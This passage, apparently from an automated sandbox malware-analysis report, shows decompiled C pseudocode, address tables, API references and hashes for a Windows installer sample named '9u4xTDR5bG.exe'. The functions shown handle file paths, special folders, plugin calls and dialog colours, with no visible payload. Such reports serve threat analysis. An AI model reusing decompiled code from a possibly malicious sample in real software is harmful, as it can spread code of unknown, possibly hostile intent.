                                                  				} else {
                                                  					CloseHandle(E0040602D(_t44, 0, 1));
                                                  					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				return _t12;
                                                  			}



















                                                  0x00406183
                                                  0x0040618c
                                                  0x00406193
                                                  0x0040619d
                                                  0x004061b1
                                                  0x004061d9
                                                  0x004061e4
                                                  0x004061e8
                                                  0x00406208
                                                  0x0040620f
                                                  0x00406219
                                                  0x00406226
                                                  0x0040622b
                                                  0x00406230
                                                  0x00406234
                                                  0x00406243
                                                  0x00406245
                                                  0x00406252
                                                  0x00406256
                                                  0x004062f1
                                                  0x00000000
                                                  0x0040626c
                                                  0x00406279
                                                  0x0040629d
                                                  0x004062a1
                                                  0x004062c0
                                                  0x004062c4
                                                  0x004062c4
                                                  0x004062c6
                                                  0x004062cf
                                                  0x004062da
                                                  0x004062e5
                                                  0x004062eb
                                                  0x00000000
                                                  0x004062eb
                                                  0x004062a3
                                                  0x004062a6
                                                  0x004062b1
                                                  0x004062ad
                                                  0x004062af
                                                  0x004062b0
                                                  0x004062b0
                                                  0x004062b8
                                                  0x004062ba
                                                  0x00000000
                                                  0x004062ba
                                                  0x00406284
                                                  0x0040628a
                                                  0x00000000
                                                  0x0040628a
                                                  0x00406256
                                                  0x00406234
                                                  0x004061b3
                                                  0x004061be
                                                  0x004061c7
                                                  0x004061cb
                                                  0x00000000
                                                  0x00000000
                                                  0x004061cb
                                                  0x004062fc

                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                  • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                  • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                  • wsprintfA.USER32 ref: 00406202
                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                  • GlobalFree.KERNEL32 ref: 004062EB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9u4xTDR5bG.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                  • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                  • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                  • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                  				struct _ITEMIDLIST* _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _t44;
                                                  				WCHAR* _t45;
                                                  				signed char _t47;
                                                  				signed int _t48;
                                                  				short _t59;
                                                  				short _t61;
                                                  				short _t63;
                                                  				void* _t71;
                                                  				signed int _t77;
                                                  				signed int _t78;
                                                  				short _t81;
                                                  				short _t82;
                                                  				signed char _t84;
                                                  				signed int _t85;
                                                  				void* _t98;
                                                  				void* _t104;
                                                  				intOrPtr* _t105;
                                                  				void* _t107;
                                                  				WCHAR* _t108;
                                                  				void* _t110;
                                                  
                                                  				_t107 = __esi;
                                                  				_t104 = __edi;
                                                  				_t71 = __ebx;
                                                  				_t44 = _a8;
                                                  				if(_t44 < 0) {
                                                  					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                                                  				}
                                                  				_push(_t71);
                                                  				_push(_t107);
                                                  				_push(_t104);
                                                  				_t105 =  *0x434f38 + _t44 * 2;
                                                  				_t45 = 0x432ea0;
                                                  				_t108 = 0x432ea0;
                                                  				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                  					_t108 = _a4;
                                                  					_a4 = _a4 & 0x00000000;
                                                  				}
                                                  				_t81 =  *_t105;
                                                  				_a8 = _t81;
                                                  				if(_t81 == 0) {
                                                  					L43:
                                                  					 *_t108 =  *_t108 & 0x00000000;
                                                  					if(_a4 == 0) {
                                                  						return _t45;
                                                  					}
                                                  					return E0040653D(_a4, _t45);
                                                  				} else {
                                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                  						_t98 = 2;
                                                  						_t105 = _t105 + _t98;
                                                  						if(_t81 >= 4) {
                                                  							if(__eflags != 0) {
                                                  								 *_t108 = _t81;
                                                  								_t108 = _t108 + _t98;
                                                  								__eflags = _t108;
                                                  							} else {
                                                  								 *_t108 =  *_t105;
                                                  								_t108 = _t108 + _t98;
                                                  								_t105 = _t105 + _t98;
                                                  							}
                                                  							L42:
                                                  							_t82 =  *_t105;
                                                  							_a8 = _t82;
                                                  							if(_t82 != 0) {
                                                  								_t81 = _a8;
                                                  								continue;
                                                  							}
                                                  							goto L43;
                                                  						}
                                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                  						_t47 =  *_t105;
                                                  						_t48 = _t47 & 0x000000ff;
                                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                  						_t85 = _t84 & 0x000000ff;
                                                  						_v28 = _t48 | 0x00008000;
                                                  						_t77 = 2;
                                                  						_v16 = _t85;
                                                  						_t105 = _t105 + _t77;
                                                  						_v24 = _t48;
                                                  						_v20 = _t85 | 0x00008000;
                                                  						if(_a8 != _t77) {
                                                  							__eflags = _a8 - 3;
                                                  							if(_a8 != 3) {
                                                  								__eflags = _a8 - 1;
                                                  								if(__eflags == 0) {
                                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                                  									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                  								}
                                                  								L38:
                                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                  								_t45 = 0x432ea0;
                                                  								goto L42;
                                                  							}
                                                  							_t78 = _v12;
                                                  							__eflags = _t78 - 0x1d;
                                                  							if(_t78 != 0x1d) {
                                                  								__eflags = (_t78 << 0xb) + 0x436000;
                                                  								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                  							} else {
                                                  								E00406484(_t108,  *0x434f08);
                                                  							}
                                                  							__eflags = _t78 + 0xffffffeb - 7;
                                                  							if(__eflags < 0) {
                                                  								L29:
                                                  								E004067C4(_t108);
                                                  							}
                                                  							goto L38;
                                                  						}
                                                  						if( *0x434f84 != 0) {
                                                  							_t77 = 4;
                                                  						}
                                                  						_t121 = _t48;
                                                  						if(_t48 >= 0) {
                                                  							__eflags = _t48 - 0x25;
                                                  							if(_t48 != 0x25) {
                                                  								__eflags = _t48 - 0x24;
                                                  								if(_t48 == 0x24) {
                                                  									GetWindowsDirectoryW(_t108, 0x400);
                                                  									_t77 = 0;
                                                  								}
                                                  								while(1) {
                                                  									__eflags = _t77;
                                                  									if(_t77 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									_t59 =  *0x434f04;
                                                  									_t77 = _t77 - 1;
                                                  									__eflags = _t59;
                                                  									if(_t59 == 0) {
                                                  										L22:
                                                  										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                  										__eflags = _t61;
                                                  										if(_t61 != 0) {
                                                  											L24:
                                                  											 *_t108 =  *_t108 & 0x00000000;
                                                  											__eflags =  *_t108;
                                                  											continue;
                                                  										}
                                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                  										_a8 = _t61;
                                                  										__imp__CoTaskMemFree(_v8);
                                                  										__eflags = _a8;
                                                  										if(_a8 != 0) {
                                                  											goto L26;
                                                  										}
                                                  										goto L24;
                                                  									}
                                                  									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                  									__eflags = _t63;
                                                  									if(_t63 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									goto L22;
                                                  								}
                                                  								goto L26;
                                                  							}
                                                  							GetSystemDirectoryW(_t108, 0x400);
                                                  							goto L26;
                                                  						} else {
                                                  							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                  							if( *_t108 != 0) {
                                                  								L27:
                                                  								if(_v16 == 0x1a) {
                                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                  							L26:
                                                  							if( *_t108 == 0) {
                                                  								goto L29;
                                                  							}
                                                  							goto L27;
                                                  						}
                                                  					}
                                                  					goto L43;
                                                  				}
                                                  			}





























                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x00406580
                                                  0x00406585
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x0040659f
                                                  0x004065a0
                                                  0x004065a1
                                                  0x004065a4
                                                  0x004065ac
                                                  0x004065ae
                                                  0x004065bf
                                                  0x004065c2
                                                  0x004065c2
                                                  0x004065c6
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004067aa
                                                  0x004067aa
                                                  0x004067b5
                                                  0x004067c1
                                                  0x004067c1
                                                  0x00000000
                                                  0x004065d5
                                                  0x004065da
                                                  0x004065ef
                                                  0x004065f0
                                                  0x004065f6
                                                  0x00406788
                                                  0x00406796
                                                  0x00406799
                                                  0x00406799
                                                  0x0040678a
                                                  0x0040678d
                                                  0x00406790
                                                  0x00406792
                                                  0x00406792
                                                  0x0040679b
                                                  0x0040679b
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004065d7
                                                  0x00000000
                                                  0x004065d7
                                                  0x00000000
                                                  0x004067a4
                                                  0x004065fc
                                                  0x004065ff
                                                  0x0040660e
                                                  0x00406615
                                                  0x00406621
                                                  0x00406624
                                                  0x00406627
                                                  0x00406628
                                                  0x0040662d
                                                  0x00406633
                                                  0x00406636
                                                  0x00406639
                                                  0x0040672c
                                                  0x00406731
                                                  0x00406764
                                                  0x00406769
                                                  0x0040676e
                                                  0x00406773
                                                  0x00406773
                                                  0x00406778
                                                  0x0040677e
                                                  0x00406781
                                                  0x00000000
                                                  0x00406781
                                                  0x00406733
                                                  0x00406736
                                                  0x00406739
                                                  0x0040674e
                                                  0x00406755
                                                  0x0040673b
                                                  0x00406742
                                                  0x00406742
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406724
                                                  0x00406725
                                                  0x00406725
                                                  0x00000000
                                                  0x00406760
                                                  0x00406646
                                                  0x0040664a
                                                  0x0040664a
                                                  0x0040664b
                                                  0x0040664d
                                                  0x0040668a
                                                  0x0040668d
                                                  0x0040669d
                                                  0x004066a0
                                                  0x004066a8
                                                  0x004066ae
                                                  0x004066ae
                                                  0x00406709
                                                  0x00406709
                                                  0x0040670b
                                                  0x00000000
                                                  0x00000000
                                                  0x004066b2
                                                  0x004066b7
                                                  0x004066b8
                                                  0x004066ba
                                                  0x004066d1
                                                  0x004066df
                                                  0x004066e5
                                                  0x004066e7
                                                  0x00406705
                                                  0x00406705
                                                  0x00406705
                                                  0x00000000
                                                  0x00406705
                                                  0x004066ed
                                                  0x004066f6
                                                  0x004066f9
                                                  0x004066ff
                                                  0x00406703
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406703
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066cf
                                                  0x00000000
                                                  0x00406709
                                                  0x00406695
                                                  0x00000000
                                                  0x0040664f
                                                  0x0040666d
                                                  0x00406676
                                                  0x00406713
                                                  0x00406717
                                                  0x0040671f
                                                  0x0040671f
                                                  0x00000000
                                                  0x00406717
                                                  0x00406680
                                                  0x0040670d
                                                  0x00406711
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406711
                                                  0x0040664d
                                                  0x00000000
                                                  0x004065da

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00000000,00425A20,7519EA30), ref: 004066A8
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000), ref: 00406779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4260037668-1749930806
                                                  • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                  • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                  • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                  • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E73202655() {
                                                  				intOrPtr _t24;
                                                  				void* _t26;
                                                  				intOrPtr _t27;
                                                  				signed int _t39;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				intOrPtr _t44;
                                                  				void* _t45;
                                                  
                                                  				_t40 = E732012BB();
                                                  				_t24 =  *((intOrPtr*)(_t45 + 0x18));
                                                  				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
                                                  				_t43 = (_t44 + 0x81 << 5) + _t24;
                                                  				do {
                                                  					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
                                                  					}
                                                  					_t39 =  *(_t43 - 8) & 0x000000ff;
                                                  					if(_t39 <= 7) {
                                                  						switch( *((intOrPtr*)(_t39 * 4 +  &M73202784))) {
                                                  							case 0:
                                                  								 *_t40 = 0;
                                                  								goto L17;
                                                  							case 1:
                                                  								__eax =  *__eax;
                                                  								if(__ecx > __ebx) {
                                                  									 *(__esp + 0x10) = __ecx;
                                                  									__ecx =  *(0x7320407c + __edx * 4);
                                                  									__edx =  *(__esp + 0x10);
                                                  									__ecx = __ecx * __edx;
                                                  									asm("sbb edx, edx");
                                                  									__edx = __edx & __ecx;
                                                  									__eax = __eax &  *(0x7320409c + __edx * 4);
                                                  								}
                                                  								_push(__eax);
                                                  								goto L15;
                                                  							case 2:
                                                  								__eax = E73201510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                  								goto L16;
                                                  							case 3:
                                                  								__ecx =  *0x7320506c;
                                                  								__edx = __ecx - 1;
                                                  								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
                                                  								__eax =  *0x7320506c;
                                                  								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
                                                  								goto L17;
                                                  							case 4:
                                                  								__eax = lstrcpynW(__edi,  *__eax,  *0x7320506c);
                                                  								goto L17;
                                                  							case 5:
                                                  								_push( *0x7320506c);
                                                  								_push(__edi);
                                                  								_push( *__eax);
                                                  								" {<u@u<u"();
                                                  								goto L17;
                                                  							case 6:
                                                  								_push( *__esi);
                                                  								L15:
                                                  								__eax = wsprintfW(__edi, 0x73205000);
                                                  								L16:
                                                  								__esp = __esp + 0xc;
                                                  								goto L17;
                                                  						}
                                                  					}
                                                  					L17:
                                                  					_t26 =  *(_t43 + 0x14);
                                                  					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                  						GlobalFree(_t26);
                                                  					}
                                                  					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                  					if(_t27 != 0) {
                                                  						if(_t27 != 0xffffffff) {
                                                  							if(_t27 > 0) {
                                                  								E73201381(_t27 - 1, _t40);
                                                  								goto L26;
                                                  							}
                                                  						} else {
                                                  							E73201312(_t40);
                                                  							L26:
                                                  						}
                                                  					}
                                                  					_t44 = _t44 - 1;
                                                  					_t43 = _t43 - 0x20;
                                                  				} while (_t44 >= 0);
                                                  				return GlobalFree(_t40);
                                                  			}











                                                  0x7320265f
                                                  0x73202661
                                                  0x73202665
                                                  0x73202674
                                                  0x73202678
                                                  0x7320267d
                                                  0x7320267d
                                                  0x73202685
                                                  0x7320268c
                                                  0x73202692
                                                  0x00000000
                                                  0x73202699
                                                  0x00000000
                                                  0x00000000
                                                  0x732026a1
                                                  0x732026a5
                                                  0x732026a8
                                                  0x732026ac
                                                  0x732026b3
                                                  0x732026b7
                                                  0x732026bd
                                                  0x732026bf
                                                  0x732026c1
                                                  0x732026c1
                                                  0x732026c8
                                                  0x00000000
                                                  0x00000000
                                                  0x732026d1
                                                  0x00000000
                                                  0x00000000
                                                  0x732026d8
                                                  0x732026de
                                                  0x732026e8
                                                  0x732026ee
                                                  0x732026f3
                                                  0x00000000
                                                  0x00000000
                                                  0x73202714
                                                  0x00000000
                                                  0x00000000
                                                  0x732026fa
                                                  0x73202700
                                                  0x73202701
                                                  0x73202703
                                                  0x00000000
                                                  0x00000000
                                                  0x7320271c
                                                  0x7320271e
                                                  0x73202724
                                                  0x7320272a
                                                  0x7320272a
                                                  0x00000000
                                                  0x00000000
                                                  0x73202692
                                                  0x7320272d
                                                  0x7320272d
                                                  0x73202732
                                                  0x73202743
                                                  0x73202743
                                                  0x73202749
                                                  0x7320274e
                                                  0x73202753
                                                  0x7320275f
                                                  0x73202764
                                                  0x00000000
                                                  0x73202769
                                                  0x73202755
                                                  0x73202756
                                                  0x7320276a
                                                  0x7320276a
                                                  0x73202753
                                                  0x7320276b
                                                  0x7320276c
                                                  0x7320276f
                                                  0x73202783

                                                  APIs
                                                    • Part of subcall function 732012BB: GlobalAlloc.KERNELBASE(00000040,?,732012DB,?,7320137F,00000019,732011CA,-000000A0), ref: 732012C5
                                                  • GlobalFree.KERNEL32 ref: 73202743
                                                  • GlobalFree.KERNEL32 ref: 73202778
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID: {<u@u<u
                                                  • API String ID: 1780285237-2852364109
                                                  • Opcode ID: 7c529c619bc51a52053ea380a1cc8bf972bfa63c997b1762c23e1ee72bd4aa35
                                                  • Instruction ID: 061c908422b10e83f5ac37e62579a50b3dd2b72f403f1b1ab100d239200d7629
                                                  • Opcode Fuzzy Hash: 7c529c619bc51a52053ea380a1cc8bf972bfa63c997b1762c23e1ee72bd4aa35
                                                  • Instruction Fuzzy Hash: C531067260421ADFD7269F65CAC8F2E77BBFB85308724912AF14593160C734688CDB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				long _t39;
                                                  				long _t41;
                                                  				void* _t44;
                                                  				signed char _t50;
                                                  				long* _t54;
                                                  
                                                  				if(_a4 + 0xfffffecd > 5) {
                                                  					L18:
                                                  					return 0;
                                                  				}
                                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                  					goto L18;
                                                  				} else {
                                                  					_t50 = _t54[5];
                                                  					if((_t50 & 0xffffffe0) != 0) {
                                                  						goto L18;
                                                  					}
                                                  					_t39 =  *_t54;
                                                  					if((_t50 & 0x00000002) != 0) {
                                                  						_t39 = GetSysColor(_t39);
                                                  					}
                                                  					if((_t54[5] & 0x00000001) != 0) {
                                                  						SetTextColor(_a8, _t39);
                                                  					}
                                                  					SetBkMode(_a8, _t54[4]);
                                                  					_t41 = _t54[1];
                                                  					_v16.lbColor = _t41;
                                                  					if((_t54[5] & 0x00000008) != 0) {
                                                  						_t41 = GetSysColor(_t41);
                                                  						_v16.lbColor = _t41;
                                                  					}
                                                  					if((_t54[5] & 0x00000004) != 0) {
                                                  						SetBkColor(_a8, _t41);
                                                  					}
                                                  					if((_t54[5] & 0x00000010) != 0) {
                                                  						_v16.lbStyle = _t54[2];
                                                  						_t44 = _t54[3];
                                                  						if(_t44 != 0) {
                                                  							DeleteObject(_t44);
                                                  						}
                                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                                  					}
                                                  					return _t54[3];
                                                  				}
                                                  			}









                                                  0x00404512
                                                  0x004045c8
                                                  0x00000000
                                                  0x004045c8
                                                  0x00404523
                                                  0x00404527
                                                  0x00000000
                                                  0x00404541
                                                  0x00404541
                                                  0x0040454a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040454c
                                                  0x00404558
                                                  0x0040455b
                                                  0x0040455b
                                                  0x00404561
                                                  0x00404567
                                                  0x00404567
                                                  0x00404573
                                                  0x00404579
                                                  0x00404580
                                                  0x00404583
                                                  0x00404586
                                                  0x00404588
                                                  0x00404588
                                                  0x00404590
                                                  0x00404596
                                                  0x00404596
                                                  0x004045a0
                                                  0x004045a5
                                                  0x004045a8
                                                  0x004045ad
                                                  0x004045b0
                                                  0x004045b0
                                                  0x004045c0
                                                  0x004045c0
                                                  0x00000000
                                                  0x004045c3

                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                  • GetSysColor.USER32(00000000), ref: 0040455B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                  • SetBkMode.GDI32(?,?), ref: 00404573
                                                  • GetSysColor.USER32(?), ref: 00404586
                                                  • SetBkColor.GDI32(?,?), ref: 00404596
                                                  • DeleteObject.GDI32(?), ref: 004045B0
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                  				intOrPtr _t65;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t72;
                                                  				void* _t76;
                                                  				void* _t79;
                                                  
                                                  				_t72 = __edx;
                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                  				_t65 = 2;
                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                  				_t66 = E00402D84(_t65);
                                                  				_t79 = _t66 - 1;
                                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                  				if(_t79 < 0) {
                                                  					L36:
                                                  					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                                  				} else {
                                                  					__ecx = 0x3ff;
                                                  					if(__eax > 0x3ff) {
                                                  						 *(__ebp - 0x44) = 0x3ff;
                                                  					}
                                                  					if( *__edi == __bx) {
                                                  						L34:
                                                  						__ecx =  *(__ebp - 0xc);
                                                  						__eax =  *(__ebp - 8);
                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                  						if(_t79 == 0) {
                                                  							 *(_t76 - 4) = 1;
                                                  						}
                                                  						goto L36;
                                                  					} else {
                                                  						 *(__ebp - 0x38) = __ebx;
